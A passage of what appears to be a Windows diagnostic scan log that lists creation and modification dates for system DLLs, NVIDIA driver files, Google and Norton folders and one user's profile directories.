2016-08-18 23:17 - 2015-07-23 22:24 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\ReInfo.dll
2016-08-18 23:17 - 2015-07-18 23:23 - 00505344 _____ C:\Windows\system32\EditionUpgradeManagerObj.dll
2016-08-18 23:17 - 2015-07-18 23:18 - 00430592 _____ (Microsoft Corporation) C:\Windows\system32\sppcomapi.dll
2016-08-18 23:17 - 2015-07-18 01:02 - 00290312 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2016-08-18 23:17 - 2015-07-17 23:49 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2016-08-18 23:17 - 2015-07-17 23:49 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\BootMenuUX.dll
2016-08-18 23:17 - 2015-07-15 23:33 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\srumsvc.dll
2016-08-18 23:17 - 2015-07-15 23:19 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumsvc.dll
2016-08-18 23:17 - 2015-07-10 11:47 - 00265480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-08-18 23:17 - 2015-07-10 10:52 - 00335248 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-08-18 23:16 - 2016-08-03 02:15 - 00046080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NAPCRYPT.DLL
2016-08-18 23:16 - 2016-08-03 01:46 - 00158048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-08-18 23:16 - 2016-08-03 00:57 - 00694784 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-08-18 23:16 - 2016-08-03 00:45 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\iassvcs.dll
2016-08-18 23:16 - 2016-08-03 00:43 - 00107008 _____ (Microsoft Corporation) C:\Windows\system32\eappgnui.dll
2016-08-18 23:16 - 2016-08-03 00:38 - 00110080 _____ (Microsoft Corporation) C:\Windows\system32\IdCtrls.dll
2016-08-18 23:16 - 2016-08-03 00:38 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Shell.Search.UriHandler.dll
2016-08-18 23:16 - 2016-08-03 00:37 - 00136192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iassvcs.dll
2016-08-18 23:16 - 2016-08-03 00:36 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eappgnui.dll
2016-08-18 23:16 - 2016-08-03 00:35 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00763904 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00394752 _____ (Microsoft Corporation) C:\Windows\system32\Search.ProtocolHandler.MAPI2.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00149504 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00148992 _____ (Microsoft Corporation) C:\Windows\system32\moshostcore.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\moshost.dll
2016-08-18 23:16 - 2016-08-03 00:34 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\MosHostClient.dll
2016-08-18 23:16 - 2016-08-03 00:33 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\TpmTasks.dll
2016-08-18 23:16 - 2016-08-03 00:33 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2016-08-18 23:16 - 2016-08-03 00:31 - 00040960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Shell.Search.UriHandler.dll
2016-08-18 23:16 - 2016-08-03 00:30 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IdCtrls.dll
2016-08-18 23:16 - 2016-08-03 00:29 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apprepapi.dll
2016-08-18 23:16 - 2016-08-03 00:26 - 00282624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2016-08-18 23:16 - 2016-08-03 00:26 - 00117760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2016-08-18 23:16 - 2016-08-03 00:25 - 00695808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2016-08-18 23:16 - 2016-08-03 00:25 - 00244224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2016-08-18 23:16 - 2016-08-03 00:25 - 00173056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2016-08-18 23:16 - 2016-08-03 00:25 - 00041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MosHostClient.dll
2016-08-18 23:16 - 2016-08-03 00:25 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2016-08-18 23:16 - 2016-05-28 01:02 - 00113144 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-08-18 23:16 - 2016-05-28 00:59 - 00131208 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2016-08-18 23:16 - 2016-05-28 00:53 - 00026464 _____ (Microsoft Corporation) C:\Windows\system32\browser_broker.exe
2016-08-18 23:16 - 2016-05-28 00:38 - 00097096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-08-18 23:16 - 2016-05-28 00:35 - 00112632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2016-08-18 23:16 - 2016-05-27 23:53 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\FwRemoteSvr.dll
2016-08-18 23:16 - 2016-05-27 23:38 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FwRemoteSvr.dll
2016-08-18 23:16 - 2016-03-15 23:55 - 00183296 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2016-08-18 23:16 - 2016-03-15 23:47 - 00511488 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-08-18 23:16 - 2016-03-15 23:47 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-08-18 23:16 - 2016-03-15 23:43 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-08-18 23:16 - 2016-03-15 23:40 - 00280576 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2016-08-18 23:16 - 2016-03-15 23:36 - 00115712 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2016-08-18 23:16 - 2016-03-15 23:36 - 00068608 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenanceClient.dll
2016-08-18 23:16 - 2016-03-15 23:28 - 00163328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2016-08-18 23:16 - 2016-03-15 23:24 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-08-18 23:16 - 2016-03-15 23:24 - 00019456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-08-18 23:16 - 2016-03-15 23:20 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-08-18 23:16 - 2016-03-15 23:17 - 00203776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vaultcli.dll
2016-08-18 23:16 - 2016-03-15 23:13 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2016-08-18 23:16 - 2016-03-15 23:13 - 00052736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PimIndexMaintenanceClient.dll
2016-08-18 23:16 - 2016-02-23 10:51 - 00146784 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2016-08-18 23:16 - 2016-02-23 10:41 - 00078040 _____ (Microsoft Corporation) C:\Windows\system32\wkscli.dll
2016-08-18 23:16 - 2016-02-23 10:40 - 00110584 _____ (Microsoft Corporation) C:\Windows\system32\srvcli.dll
2016-08-18 23:16 - 2016-02-23 10:36 - 00080128 _____ (Microsoft Corporation) C:\Windows\system32\netapi32.dll
2016-08-18 23:16 - 2016-02-23 09:21 - 00529456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2016-08-18 23:16 - 2016-02-23 09:21 - 00141152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2016-08-18 23:16 - 2016-02-23 09:11 - 00073360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srvcli.dll
2016-08-18 23:16 - 2016-02-23 09:11 - 00055808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wkscli.dll
2016-08-18 23:16 - 2016-02-23 09:06 - 00069232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netapi32.dll
2016-08-18 23:16 - 2016-02-23 07:17 - 00133120 _____ (Microsoft Corporation) C:\Windows\system32\browser.dll
2016-08-18 23:16 - 2016-02-23 07:17 - 00058368 _____ (Microsoft Corporation) C:\Windows\system32\browcli.dll
2016-08-18 23:16 - 2016-02-23 06:29 - 00043520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\browcli.dll
2016-08-18 23:16 - 2016-01-31 01:24 - 00047616 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-08-18 23:16 - 2016-01-31 01:13 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\ztrace_maps.dll
2016-08-18 23:16 - 2016-01-31 00:58 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ztrace_maps.dll
2016-08-18 23:16 - 2016-01-04 22:50 - 01817064 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2016-08-18 23:16 - 2015-12-01 02:03 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\gpuenergydrv.sys
2016-08-18 23:16 - 2015-11-25 01:32 - 00113184 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2016-08-18 23:16 - 2015-11-25 00:59 - 00092992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2016-08-18 23:16 - 2015-11-25 00:36 - 00022528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usb8023.sys
2016-08-18 23:16 - 2015-11-25 00:22 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-08-18 23:16 - 2015-11-25 00:22 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZST.DLL
2016-08-18 23:16 - 2015-11-25 00:22 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-08-18 23:16 - 2015-11-25 00:22 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-08-18 23:16 - 2015-11-25 00:04 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-08-18 23:16 - 2015-11-25 00:04 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZST.DLL
2016-08-18 23:16 - 2015-11-25 00:04 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-08-18 23:16 - 2015-11-25 00:04 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-08-18 23:16 - 2015-11-05 00:56 - 00025280 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-08-18 23:16 - 2015-10-10 03:12 - 00078528 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-08-18 23:16 - 2015-09-19 01:14 - 00102304 _____ (Microsoft Corporation) C:\Windows\system32\omadmapi.dll
2016-08-18 23:16 - 2015-09-17 02:50 - 00088384 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2016-08-18 23:16 - 2015-09-17 02:26 - 00508248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-08-18 23:16 - 2015-09-17 02:11 - 00160256 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
2016-08-18 23:16 - 2015-09-17 02:10 - 00169984 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll
2016-08-18 23:16 - 2015-09-17 02:09 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\provops.dll
2016-08-18 23:16 - 2015-09-17 02:02 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-08-18 23:16 - 2015-09-17 01:52 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\nlasvc.dll
2016-08-18 23:16 - 2015-09-17 01:51 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll
2016-08-18 23:16 - 2015-09-17 01:50 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\LocationPeWiFi.dll
2016-08-18 23:16 - 2015-09-17 01:50 - 00204288 _____ (Microsoft Corporation) C:\Windows\system32\LocationPeCell.dll
2016-08-18 23:16 - 2015-09-17 01:49 - 00439296 _____ (Microsoft Corporation) C:\Windows\system32\LocationWebproxy.dll
2016-08-18 23:16 - 2015-09-17 01:49 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\LocationCrowdsource.dll
2016-08-18 23:16 - 2015-09-17 01:49 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\LocationPeIP.dll
2016-08-18 23:16 - 2015-09-17 01:49 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\LocationWiFiAdapter.dll
2016-08-18 23:16 - 2015-09-17 01:46 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCore.dll
2016-08-18 23:16 - 2015-09-17 01:46 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2016-08-18 23:16 - 2015-08-18 02:59 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\WcnApi.dll
2016-08-18 23:16 - 2015-08-18 02:58 - 00117760 _____ (Microsoft Corporation) C:\Windows\system32\dafWCN.dll
2016-08-18 23:16 - 2015-08-18 02:58 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\fdWCN.dll
2016-08-18 23:16 - 2015-08-18 02:34 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfdprov.dll
2016-08-18 23:16 - 2015-08-18 00:44 - 00008847 _____ C:\Windows\system32\ResPriHMImageList
2016-08-18 23:16 - 2015-08-02 22:17 - 00052264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wpcfltr.sys
2016-08-18 23:16 - 2015-07-29 23:44 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\SensorsNativeApi.V2.dll
2016-08-18 23:16 - 2015-07-29 23:44 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\VoiceActivationManager.dll
2016-08-18 23:16 - 2015-07-29 23:06 - 00078336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsNativeApi.V2.dll
2016-08-18 23:16 - 2015-07-25 23:39 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\sendmail.dll
2016-08-18 23:16 - 2015-07-25 23:29 - 00104960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sendmail.dll
2016-08-18 23:16 - 2015-07-22 00:13 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\calc.exe
2016-08-18 23:16 - 2015-07-21 23:21 - 00031232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\calc.exe
2016-08-18 23:16 - 2015-07-17 23:49 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\spbcd.dll
2016-08-18 23:16 - 2015-07-17 23:47 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-08-18 23:16 - 2015-07-16 22:39 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2016-08-18 23:16 - 2015-07-16 22:05 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
2016-08-18 23:16 - 2015-07-13 21:38 - 00291840 _____ (Microsoft Corporation) C:\Windows\system32\systemcpl.dll
2016-08-18 23:16 - 2015-07-13 21:20 - 00279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\systemcpl.dll
2016-08-18 23:16 - 2015-07-10 06:42 - 00045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hmkd.dll
2016-08-18 21:46 - 2016-08-18 21:46 - 00000000 ____D C:\Users\Public\Downloads\Norton
2016-08-17 23:26 - 2016-08-17 23:26 - 00000000 ____D C:\Users\Default\AppData\Local\Google
2016-08-17 23:26 - 2016-08-17 23:26 - 00000000 ____D C:\Users\Default User\AppData\Local\Google
2016-07-28 18:11 - 2016-07-28 18:11 - 00000000 ____D C:\Users\Ryan\AppData\Local\MicrosoftEdge
2016-07-28 18:03 - 2016-07-28 18:03 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-07-28 17:55 - 2016-08-22 20:46 - 00002360 _____ C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-07-28 17:55 - 2016-08-22 20:46 - 00000000 ___RD C:\Users\Ryan\OneDrive
2016-07-28 17:53 - 2016-08-26 22:00 - 00000000 ____D C:\Users\Ryan\AppData\Local\Packages
2016-07-28 17:53 - 2016-07-28 17:53 - 00000020 ___SH C:\Users\Ryan\ntuser.ini
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 _SHDL C:\Users\Ryan\My Documents
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 _SHDL C:\Users\Ryan\Documents\My Videos
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 _SHDL C:\Users\Ryan\Documents\My Pictures
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 _SHDL C:\Users\Ryan\Documents\My Music
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 ____D C:\Users\Ryan\AppData\Roaming\Adobe
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 ____D C:\Users\Ryan\AppData\Local\VirtualStore
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 ____D C:\Users\Ryan\AppData\Local\TileDataLayer
2016-07-28 17:53 - 2016-07-28 17:53 - 00000000 ____D C:\Users\Ryan\AppData\Local\Publishers
2016-07-28 17:52 - 2016-07-28 17:52 - 00016148 _____ C:\Windows\system32\DESKTOP-A6RCKOD_defaultuser0_HistoryPrediction.bin
2016-07-28 17:52 - 2016-07-28 16:25 - 00000000 ____D C:\Users\Ryan
2016-07-28 16:04 - 2016-07-28 16:04 - 00000000 ____D C:\Windows\system32\SleepStudy
2016-07-28 16:02 - 2016-07-28 16:02 - 00204032 _____ (Intel Corporation) C:\Windows\system32\Drivers\TeeDriverW8x64.sys
2016-07-28 15:48 - 2016-08-03 14:27 - 00000000 ____D C:\Windows\SysWOW64\LiveUpdate
2016-07-28 15:48 - 2016-07-19 19:27 - 00012669 _____ C:\Windows\SysWOW64\ReleaseNote.txt
2016-07-28 15:20 - 2016-08-19 16:56 - 00000000 ____D C:\ProgramData\Norton
2016-07-28 15:19 - 2016-08-27 04:06 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-07-28 15:19 - 2016-08-26 23:24 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-07-28 15:19 - 2016-08-19 04:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-07-28 15:19 - 2016-08-18 00:25 - 00000000 ____D C:\Users\Ryan\AppData\Local\Google
2016-07-28 15:19 - 2016-08-17 23:19 - 00003996 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-07-28 15:19 - 2016-08-17 23:19 - 00003764 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-07-28 15:19 - 2016-08-17 23:15 - 00002344 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-07-28 15:19 - 2016-08-17 23:15 - 00002332 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-07-28 15:19 - 2016-07-28 15:19 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-07-28 15:19 - 2016-07-28 15:19 - 00000000 ____D C:\ProgramData\Google
2016-07-28 15:19 - 2016-07-28 15:19 - 00000000 ____D C:\Program Files\Google
2016-07-28 15:19 - 2016-07-28 15:19 - 00000000 ____D C:\Program Files (x86)\Google
2016-07-28 15:18 - 2016-08-20 16:37 - 00000000 ____D C:\MSI
2016-07-28 15:18 - 2016-07-28 15:18 - 00000000 ____D C:\Users\Ryan\AppData\Local\NVIDIA
2016-07-28 15:18 - 2016-07-28 15:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2016-07-28 15:18 - 2016-07-28 15:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI Kombustor 2.5
2016-07-28 15:18 - 2016-07-28 15:18 - 00000000 ____D C:\Program Files (x86)\MSI Kombustor 2.5
2016-07-28 15:18 - 2015-08-26 20:37 - 01423120 ____R (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2016-07-28 15:18 - 2015-08-26 20:37 - 01316000 ____R (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2016-07-28 15:18 - 2015-08-26 20:36 - 01756424 ____R (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2016-07-28 15:18 - 2015-08-26 20:36 - 01710568 ____R (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2016-07-28 15:18 - 2015-08-11 00:52 - 00072504 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2016-07-28 15:18 - 2015-08-11 00:52 - 00069416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2016-07-28 15:18 - 2015-08-11 00:52 - 00050472 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2016-07-28 15:18 - 2014-04-30 19:23 - 00011248 _____ (Windows ® Win 7 DDK provider) C:\Windows\acpimof.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 02401112 _____ (Microsoft Corporation) C:\Windows\system32\D3DX9_43.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 01998168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DX9_43.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 00511328 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_43.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 00470880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_43.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 00276832 _____ (Microsoft Corporation) C:\Windows\system32\d3dx11_43.dll
2016-07-28 15:18 - 2010-05-26 14:41 - 00248672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx11_43.dll
2016-07-28 15:17 - 2016-08-27 04:05 - 00000000 ____D C:\ProgramData\NVIDIA
2016-07-28 15:17 - 2016-07-28 15:18 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2016-07-28 15:17 - 2016-07-28 15:18 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2016-07-28 15:17 - 2015-08-25 14:38 - 01898104 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6435582.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 01567576 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 01558648 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6435582.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 00204648 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
2016-07-28 15:17 - 2015-08-25 14:38 - 00112760 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 00105080 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 00040280 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2016-07-28 15:17 - 2015-08-25 14:38 - 00034044 _____ C:\Windows\system32\nvinfo.pb
2016-07-28 15:17 - 2015-08-25 11:57 - 06884984 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2016-07-28 15:17 - 2015-08-25 11:57 - 03496752 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2016-07-28 15:17 - 2015-08-25 11:57 - 02558584 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2016-07-28 15:17 - 2015-08-25 11:57 - 00937592 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe
2016-07-28 15:17 - 2015-08-25 11:57 - 00385144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2016-07-28 15:17 - 2015-08-25 11:57 - 00062584 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2016-07-28 15:17 - 2015-08-25 10:18 - 00574072 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2016-07-28 15:17 - 2015-08-25 09:02 - 05165808 _____ C:\Windows\system32\nvcoproc.bin
2016-07-28 15:15 - 2015-08-30 18:47 - 11188880 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2016-07-28 15:15 - 2015-08-25 14:38 - 42840184 _____ C:\Windows\system32\nvcompiler.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 37819184 _____ C:\Windows\SysWOW64\nvcompiler.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 22559352 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 18569336 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 17932648 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 16646624 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 15630616 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 15334976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 14945552 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 13667032 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 12611824 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 12192048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 03480792 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 03074776 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 02354808 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 02105976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 01178576 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 01075320 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 01064752 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 01001440 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00986232 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00945272 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00176904 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00155976 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00150648 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2016-07-28 15:15 - 2015-08-25 14:38 - 00128512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2016-07-28 15:14 - 2016-07-28 15:18 - 00000000 ____D C:\Program Files\NVIDIA Corporation
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-08-27 04:05 - 2015-07-10 08:21 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-08-27 04:04 - 2015-07-10 08:20 - 00415768 _____ C:\Windows\system32\FNTCACHE.DAT
2016-08-27 04:04 - 2015-07-10 05:05 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-08-26 22:34 - 2015-07-10 07:04 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-08-26 22:33 - 2015-07-10 09:14 - 00000000 ____D C:\Windows\ShellNew
2016-08-26 22:33 - 2015-07-10 07:04 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
